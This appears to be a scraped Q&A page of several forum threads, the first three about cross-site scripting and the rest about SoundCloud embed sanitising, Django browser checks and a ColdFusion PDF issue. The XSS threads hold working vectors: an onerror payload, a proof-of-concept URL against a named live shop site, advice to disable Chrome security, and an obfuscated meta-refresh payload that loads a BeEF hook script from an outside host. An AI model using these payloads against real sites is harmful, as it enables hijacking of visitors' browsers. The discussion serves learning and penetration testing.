XSS attack with javascript in img src attribute - xss

Some older browsers are vulnerable to XSS attacks as such
<img src="javascript:alert('yo')" />
Current versions of IE, FF, Chrome are not.
I am curious if any browsers are vulnerable to a similar attack:
<img src="somefile.js" />
or
<iframe src="somefile.js" />
or other similar where somefile.js contains some malicious script.

All major browsers are still vulnerable to these attacks.
Tons of ways of using img tags are still around..
For example...
<img src='#' onerror=alert(1) />
Look for RSnake's xss cheatsheet, those are just some vectors. By the way, I've heard he's coming up with a new version of his cheatsheet soon.

No. Image data is never executed as JavaScript. The if the src is a JavaScript link, the JavaScript is executed, but the fundamental reading of data that comes from a request to the src does not involve JavaScript.

here you can find some XSS attacking vector
http://ha.ckers.org/xss.html

Related

XSS DOM vulnerable

I tested site for vulnerables (folder /service-contact) and possible XSS DOM issue came up (using Kali Linux, Vega and XSSER). However, i tried to manually test url with 'alert' script to make sure it's vulnerable. I used
www.babyland.nl/service-contact/alert("test")
No alert box/pop-up was shown, only the html code showed up in contact form box.
I am not sure i used the right code (i'm a rookie) or did the right interpretation. Server is Apache, using javascript/js.
Can you help?
Thanks!
This is Not Vulnerable to XSS, Whatever you are writing in the URL is Coming in Below Form section ( Vraag/opmerking ) . And the Double Quotes (") are Escaped. If you try another Payload like <script>alert(/xss/)</script> That Also won't work, Because this is Not Reflecting neither Storing. You will see output as a Text in Vraag/opmerking. Don't Rely on Online Scanners, Test Manually, For DOM Based XSS ..Check Sink and Sources and Analyze them.
The tool is right. There is a XSS-Vulnerability on the site, but the proof of concept (PoC) code is wrong. The content of a <textarea> can only contain character data (see <textarea> description on MDN). So your <script>alert("test")</script> is interpreted as text and not as HTML code. But you can close the <textarea> tag and insert the javascript code after that.
Here is the working PoC URL:
https://www.babyland.nl/service-contact/</textarea><script>alert("test")</script>
which is rendered as:
<textarea rows="" cols="" id="comment" name="comment"></textarea<script>alert("test")</script></textarea>
A little note to testing for XSS injection: Chrome/Chromium has a XSS protection. So this code doesn't exploit in this browser. For manual testing you can use Firefox or run Chrome with: --disable-web-security (see this StackOverflow Question and this for more information).

XSS in meta tag

Some professional pentester guy told me this xss test vector is useless for pentest.And the payload seems like this:
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
but when i'm save the code to a HTML file with more powerful javascript like hook.js (from beef exploit framework).
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%36%30%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%33%32%2C%31%31%35%2C%31%31%34%2C%39%39%2C%36%31%2C%31%30%34%2C%31%31%36%2C%31%31%36%2C%31%31%32%2C%35%38%2C%34%37%2C%34%37%2C%31%31%32%2C%31%30%38%2C%31%30%31%2C%39%38%2C%31%31%35%2C%34%36%2C%31%30%39%2C%31%30%31%2C%34%37%2C%34%38%2C%34%36%2C%31%30%36%2C%31%31%35%2C%36%32%2C%36%30%2C%34%37%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%36%32%29%29%3C%2F%73%63%72%69%70%74%3E">
it works perfectly on firefox and chrome.i can see the victim online with my beef exploit framework and a lot of function is available.
I dont really get it.what's wrong with this payload.I have asked this question several times but there is no response from him . it makes me very confuse.Is there any body can tell me why he said this one is useless for pentest.
XSS through a meta tag is highly dependent on the browser used by the target victim. A meta tag such as <meta http-equiv="refresh" content="0;url=javascript:alert(1)"> will fire malicious javascript on the hosting domain, but will only work in Safari; all other browsers refuse to follow a location: javascript: header.
When using a data URI in the tag, the browser will load the decoded payload into a null domain and any javascript will be fired in the context of a null domain. While this can still be used to fire redirects, XHR, and other such attacks it is useless for accessing anything on the hosting domain. This attack will also not work in IE since it only allows data URIs for image type elements, and I think that is even restricted to style/css.
Though meta tag injections are only successful for XSS in very limited capacity, they are still very dangerous in other attacks and are worth testing.
As far as I remember data:-URIs are loaded as a separate origin, so you cannot access the vulnerable site from the injected script. However this could be used to deliver an exploit or for phishing, so I wouldnt call it totally useless.

How to ensure users only embed SoundCloud iFrame?

I am building a social networking website for musicians and I would like them to be able to enter the embed code provided by SoundCloud, so that they may have a sound clip on their posts.
However, I am unsure how I would sanitise the input, to ensure that it's only a SoundCloud iframe embed code that they enter. I want to avoid them pasting in embed code for say, YouTube or anything else for that matter.
An example embed code from SoundCloud looks like:
<iframe width="100%" height="166" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F85146642"></iframe>
I am using the HTML parser, jSoup to sanitise input.
The key fragment to this is the src content:
https://w.soundcloud.com/player/?url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F85146642
One possibility I thought of, was to extract the src parameters value and then rebuild the iframe myself, this way, only storing the URL and ensuring that any HTML output to the browser is that which I have created myself. Doing this may also allow me to run checks on the domain name etc.
I'm wondering what the best approach would be for this?
Appreciate any input you may have.
Thanks,
Michael.
PS - I am using Railo (ColdFusion server) and the Java jSoup library, but I guess the same principles would apply regardless of what language one would use.

How to make if/else statement in Django Html Template?

I want to test for the user's browser. If Internet Explorer, then this paragraph. else this paragraph.
How do I do that in a django html template?
Thanks!
Don't do it using Django. Use conditional comments. Example:
<!--[if IE]>
According to the conditional comment this is Internet Explorer<br />
<![endif]-->
<!--[if gte IE 5]>
According to the conditional comment this is Internet Explorer 5 and up<br />
<![endif]-->
<!--[if gt IE 6]>
According to the conditional comment this is Internet Explorer greater than 6<br />
<![endif]-->
Django templates are rendered on the server side, what actually goes to the browser is the output is the rendered template. So you can't write browser specific code in the template, unless you capture that information from the request, pass it as a variable to the template, when you render it, which then uses that value to produce browser specific code.
Don't. There should almost never be a need for this. If you really really think you need it, use IE's conditional comments.

CFDOCUMENT ignores font coloring when backgroundvisible is false

Does anyone else get this problem or know a solution / workaround I could try as I'm running out of ideas? :-(
I'm running this code on ColdFusion 9 - the idea is that it creates a PDF page (a front cover to a report) applies a watermark (a design I've been given with an orange background that I put my content on) and saves it for use later down the page.
The problem I've got is firstly I needed to turn backgroundvisible on in the cfdocument tag. Reason for this is I kept getting this white square showing on top of my produced page. When I do this though cfdocument then ignore any font colour changes I make it.
I've tried all kinds of combinations of trying to get this including styles, classes. internal / external CSS files but everytime ColdFusion defaults it to black.
Does anyone have any suggestions on what I can do to get this showing in white?
<cfdocument format="pdf" marginbottom="0" marginleft="0.77" marginright="0" margintop="5" pageType="A4" unit="in" name="cover" backgroundvisible="false">
<cfoutput>
<html>
<head>
</head>
<body style="color:##fff">
here
</body>
</html>
</cfoutput>
</cfdocument>
<cfpdf action="addWatermark" copyFrom="#coverFile#" source="cover" foreground="false" opacity="10" showonprint="true" />
<cfpdf action="write" destination='#PDFDir##frontCoverFile#' source="cover" overwrite="true" />
Thanks very much,
James
P.S. It maybe that a workaround has to be using CFIMAGE to produce this and then placing that in the page instead. I'd rather not though :-(
Try using straight HTML styles . Tried it and it seemed to do the job.
Ello world
Unfortunately in the case of this question I had to strip the PDF right back to basics.
I had more problems than just this but generally when it comes to PDF features in ColdFusion Adobe will certainly have to pull their fingers out as it's really buggy :-(
Don't know anything about CF mate, but you have two hashtags before the hex colour, so it probably won't be read!